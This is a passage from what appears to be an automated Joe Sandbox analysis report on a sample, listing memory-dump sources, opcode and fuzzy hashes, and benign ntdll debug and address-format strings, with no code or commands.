              • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
              • Instruction Fuzzy Hash: 16118B32810A02DFDB229E1AC880B22B7F4FF5076AF15C86DD5895A5E6C379E880CB10
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7be68f3f5a3c906bf63e2a734ac0e96aeef37c3af1f28cf03ed712db713fd74
              • Instruction ID: 3a30d784db775f6cd88f070333448605dacc8d97cb40bf6601838af7d79f27c0
              • Opcode Fuzzy Hash: f7be68f3f5a3c906bf63e2a734ac0e96aeef37c3af1f28cf03ed712db713fd74
              • Instruction Fuzzy Hash: AB115B71A00209ABDB15EF68C884EAE7BB6EB98344F00406AFD01A7390DA35ED11CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
              • Instruction ID: 401b445a005865d55e2291711e2ee88ea77ab26c7cc144193ffe5d5643e39057
              • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
              • Instruction Fuzzy Hash: 62014772A002299BDB119B98E808F6A77E9EB94A38F10811AFE118B7D0DB34DD40C780
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
              • Instruction ID: ea780e3d6e15dc81327d2f35846eaee14e738c4667d8070edc4e8be561ae4354
              • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
              • Instruction Fuzzy Hash: D801D6B7700215E7CB129AAEED00EDB7EBCBF84658B144429BA05E7160EA34DD21C760
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8afb38b0d4643e661460643aede2a56aa4cd7f4aa145da614565e93e730a40d
              • Instruction ID: 30388ec02eb39deba52ef008ff53d54e6285a88f4c61b776d198f3af353ebdfd
              • Opcode Fuzzy Hash: b8afb38b0d4643e661460643aede2a56aa4cd7f4aa145da614565e93e730a40d
              • Instruction Fuzzy Hash: 04017171A00249AFDB14EF6DE855FAEBBB8EF44704F40406ABA04EB390D674DE05CB95
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a41e2a7159d3294b7b464b13d6704fc390fbc29d6c6108173eb9ec316644563f
              • Instruction ID: 4fb90b5812085ad213e9cca02bf107a7d6e8ed7f23feb04fcbc7d5c881bbf345
              • Opcode Fuzzy Hash: a41e2a7159d3294b7b464b13d6704fc390fbc29d6c6108173eb9ec316644563f
              • Instruction Fuzzy Hash: 94019E71A10249ABCB04EF69D841FAEBBB8EF54714F00402ABA00EB390D674DE01CB95
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
              • Instruction ID: 9d30a6bb58c3f4aba6e5a3f2a6165d4f755b157129362e8da3e6f4b354d5a18d
              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
              • Instruction Fuzzy Hash: EE0171322005849FE323961EC948F277BDCEB48B58F0904BAF909CBAE2D678DC40C761
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84f101604201a769b87ad1ed5f224663f0e476a8f8b05854be2570ee5c5fbb71
              • Instruction ID: 87664f27c7a5ae1c4a62bd235563009365805d28927b74610441b6e2a903ee70
              • Opcode Fuzzy Hash: 84f101604201a769b87ad1ed5f224663f0e476a8f8b05854be2570ee5c5fbb71
              • Instruction Fuzzy Hash: CC01F731B00509DBD714EB6EDC04ABEBBB8FF94618B8540AA9901A7690EE30DC01C390
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1eadadb7851d6c619ae9065c73f824f55945f0a7ea34a09d45b573c856997ef
              • Instruction ID: 683b040c90348978a4417a155f9fbc74fb524937a64ab19d7f41b99e5d78157b
              • Opcode Fuzzy Hash: e1eadadb7851d6c619ae9065c73f824f55945f0a7ea34a09d45b573c856997ef
              • Instruction Fuzzy Hash: 06018471A10259ABDB10EBA9D855FAF7BB8EF54704F00406AB901EB390D674DD01C794
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91105e73277b044bb7b8307ef0fce50160c4af814082fb7178c8a8be46413ee6
              • Instruction ID: 838df75588f911cba9f1923c20ea198a2fb566971883b578ccaee92e759cdc6f
              • Opcode Fuzzy Hash: 91105e73277b044bb7b8307ef0fce50160c4af814082fb7178c8a8be46413ee6
              • Instruction Fuzzy Hash: ACF0F932741610B7C7319B5ACD80F97BAADEB84E94F104029A60597A50D630ED01CBA0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 012a5b3a74993839f79ac27599c535b8865c693d0ac05eab6e9f03c82281eacf
              • Instruction ID: c99da5547f0da49cef23ea5a43c6d4f5b91f55373516c35529a51fc3a2760d9a
              • Opcode Fuzzy Hash: 012a5b3a74993839f79ac27599c535b8865c693d0ac05eab6e9f03c82281eacf
              • Instruction Fuzzy Hash: 7B012CB1A10209ABDB01DFA9D941AEEBBF8FF58704F10405AEA01E7350D634AA018BA4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38f38969ea0935cbab9974d9146881b9b061ed53e8162ec635f400903ac2100e
              • Instruction ID: f36c306255a2bfcf0e68bd5d7c4f378ff86b7414abf5d0df16e9f35a7ea75734
              • Opcode Fuzzy Hash: 38f38969ea0935cbab9974d9146881b9b061ed53e8162ec635f400903ac2100e
              • Instruction Fuzzy Hash: 0D0121B5A10209ABCB04DF69D9419EEBBF8FF59704F10405AFA01EB351D634A901CBA5
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
              • Instruction ID: 3945e2fe34d5abce96465902a1916ead0e3a6f8d8a1d0673686cf91bb81e7319
              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
              • Instruction Fuzzy Hash: A7F0AFB3600611ABD324CF4D9940E57FBEADBD1A84F04812CA609CB220EA31ED04CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04bb4ea291159b79020716f10da0ebd80c27215d961349f3fcc1356505eff240
              • Instruction ID: d24e6eddc8b778ab50f61f1174c21ddf6db15367e25bdc3deb9a5b1f6a71bdac
              • Opcode Fuzzy Hash: 04bb4ea291159b79020716f10da0ebd80c27215d961349f3fcc1356505eff240
              • Instruction Fuzzy Hash: 480121B1A00209ABDB00DF69D9459EEBBF8FF58704F50405AEA01F7350D674AD018BA4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
              • Instruction ID: f7432a287601c55e961a0a46cc38984667ba4ccf26c6ca04cff9282506125e5d
              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
              • Instruction Fuzzy Hash: 3BF021732046379FD733565D4840F6BA799CFE1A6DF591035F2099B680C978CD0157D0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e772c4da8e9cfbcea1bce1facaba059c180a90cc0c778dc01bff935356a6746
              • Instruction ID: 15295efdb72fabf1c23b62d949a717e29bbe76ac43e0c01662ac2558516e5195
              • Opcode Fuzzy Hash: 1e772c4da8e9cfbcea1bce1facaba059c180a90cc0c778dc01bff935356a6746
              • Instruction Fuzzy Hash: CC111B70A1024ADFDB04DFA9D541BAEBBF4FF08304F04426AE509EB382E634D941CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 294031d94d33b47ba24aafe6818abaf8d9355bcabaedf87303f46e01283a9da8
              • Instruction ID: b85480a92cbb50ed5f98596542c261450705d320b385f7f6151869a1c11f0edc
              • Opcode Fuzzy Hash: 294031d94d33b47ba24aafe6818abaf8d9355bcabaedf87303f46e01283a9da8
              • Instruction Fuzzy Hash: FD018F71A00249ABCB00EFADD545AEEBBF8FF58314F15405AE901E7390D734EA01CB95
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
              • Instruction ID: 9580748ff691170fc3f420a4b125232c1889174a585add12eb0b093de45b857a
              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
              • Instruction Fuzzy Hash: 72F01D7220001EBFEF019F95DD81DEF7B7EEB99698B114129FA1192160D631DE21ABA0
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d27fd18d23705088b66c7b70ebcb53c52a33b6640a9d85b8e3348e083609bfad
              • Instruction ID: 75c1f58bc24cd109054982d35f3cdde8e2a24686f27abf7b5de671b86e5e9d92
              • Opcode Fuzzy Hash: d27fd18d23705088b66c7b70ebcb53c52a33b6640a9d85b8e3348e083609bfad
              • Instruction Fuzzy Hash: 9CF0C872B10349ABDB04DFBDD415AEFB7B8EF54714F00806AE501E7290DA74D9058751
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
              • Instruction ID: f792de79d625bb0511567bd704696598f8c919b97239e47b6b1db54a2ed9ea96
              • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
              • Instruction Fuzzy Hash: D8F0F671E01366ABEB10D7AD8944FAFBBE89F90618F088155BA01972C5D630EA41C6D4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b58b7d418acbc0c9331d03e75a7973c337ea41616530f3fbd47e6e21c3b5e0d
              • Instruction ID: 004faac7c1e4d27fb12524c85db5b53744463f59d83113834f86aa93392080fb
              • Opcode Fuzzy Hash: 1b58b7d418acbc0c9331d03e75a7973c337ea41616530f3fbd47e6e21c3b5e0d
              • Instruction Fuzzy Hash: 01F024713043419BF754A7199C01B22329AE7D065CFB5902AEB058FBC1F970EC01C3A4
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
              • Instruction ID: c0b61582e1b32f655ed733ececc800e056ca20837d3d7696f6b57bfb1b20af7e
              • Opcode Fuzzy Hash: 079800e406bf3852353c7496a7d5395e7ca6d454c50807a16a0df7f8eb131d23
              • Instruction Fuzzy Hash: F290023161280282954172595904A4E410597F1302B95D426A0015599CCA3489A15721
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
              • Instruction ID: a7952a107aea66a7cd87766fee67fd4af5745959eb5bbcb6891a6b66621189fd
              • Opcode Fuzzy Hash: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
              • Instruction Fuzzy Hash: 3390022161584582D10175595508A06000597E0205F55D022A10645DADC7358991A631
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
              • Instruction ID: e3c0f023725922a206ae8b394d79783418174d1d430981880d8a1b3d5c88a48b
              • Opcode Fuzzy Hash: f9362f415fb383a38b28dd5fcc239714f39f6cbec9d7e0ec492675f4129432e4
              • Instruction Fuzzy Hash: F990023561180542D51171595904646004697E0301F55D422A042459DDC77489E1A621
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
              • Instruction ID: 3af549ea60d6b52ff773385fefc78c2028f9bcc24c641735d7faa73b405e07be
              • Opcode Fuzzy Hash: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
              • Instruction Fuzzy Hash: A390023165180542D142715945046060009A7E0241F95C023A0424599EC7758B96AF61
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
              • Instruction ID: ba6cecc19f339aca31390c538274fe0752e5b7287e384e9f3eccad53184dabb9
              • Opcode Fuzzy Hash: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
              • Instruction Fuzzy Hash: 1A90023161180982D10171594504B46000597F0301F55C027A0124699DC735C9917A21
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
              • Instruction ID: 753c5fd15aa66a9bdb35fe970e931007f48f93b3630c73d705e2de8876551e77
              • Opcode Fuzzy Hash: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
              • Instruction Fuzzy Hash: 3A90023161180543D10171595608707000597E0201F55D422A042459DDD77689916621
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
              • Instruction ID: 9fa4e54edd74b412fdf0c5df0fc9c53f4f7a3c332cc74be897372181559e2dde
              • Opcode Fuzzy Hash: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
              • Instruction Fuzzy Hash: 9E900221A1580542D14171595518706001597E0201F55D022A0024599DC7798B956BA1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
              • Instruction ID: affdeab2f724a0c5912e178e8a8c41035c687710df746d5e138ed948ddc4cd77
              • Opcode Fuzzy Hash: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
              • Instruction Fuzzy Hash: D390026162180182D10571594504706004597F1201F55C023A2154599CC6398DA15625
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
              • Instruction ID: a1091cbeb686316517bc844c5b2e529672ff1e15a1f8768d77cf280f47c138f2
              • Opcode Fuzzy Hash: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
              • Instruction Fuzzy Hash: 66900231611C0542D10171594908747000597E0302F55C022A516459AEC775C9D16A31
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
              • Instruction ID: 90330c20661c63f0ac9b86242fa71860f4210550e732bd6e1a9af00a2efaad45
              • Opcode Fuzzy Hash: 9cad8e289d5f6c99701f0e10c218dc21be724928e7637dd8a5f10eeac9c364f0
              • Instruction Fuzzy Hash: CB90022171180542D103715945146060009D7E1345F95C023E142459ADC7358A93A632
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
              • Instruction ID: 5402445b3ace3a1da0fe62cd1424fcce05f216c351e1132ed56542df47d6df06
              • Opcode Fuzzy Hash: 71296ffb3c4f9be620fddc2bad126d3ae3d7cfcd0b2a9e187cac689105b69932
              • Instruction Fuzzy Hash: 59900261611C0543D14175594904607000597E0302F55C022A206459AECB398D916635
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction ID: faa3bc59d46e19ae98341e378f68584edea85760f0a4875d322f4af6ff072fb0
              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction Fuzzy Hash:
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
              • Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
              • Opcode Fuzzy Hash: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
              • Instruction Fuzzy Hash: 8651E6B6A00256BFCB11DFAD889097FFBB8BB08244B54826EF565D7A41D334DE5087E0
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
              • Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
              • Opcode Fuzzy Hash: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
              • Instruction Fuzzy Hash: 25510371A00646BACB30DF9DC990D7FBBBCEB44208B40842BE4D6D7791E6B4DA408761
              Strings
              • Execute=1, xrefs: 01424713
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
              • ExecuteOptions, xrefs: 014246A0
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
              • Instruction ID: 11faaafb5c500d36b2864bd0e7888c6171748580a3c3028787132119c45e0d9f
              • Opcode Fuzzy Hash: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
              • Instruction Fuzzy Hash: 46512D3160032ABAEF21ABA9DC89FFA77E8EF5431CF44009DD605AB1D1D7719A458F90
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 9bb8804a780b6066669730f2c663ed6393cb39a9b6b08c9fe89c0bd8fbe894c0
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 6281D2B0E052498EEF258E6CC8517FEFFB6AF85368F18411DDA61A7299C7348840CB61
              Strings
              • RTL: Resource at %p, xrefs: 01427B8E
              • RTL: Re-Waiting, xrefs: 01427BAC
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
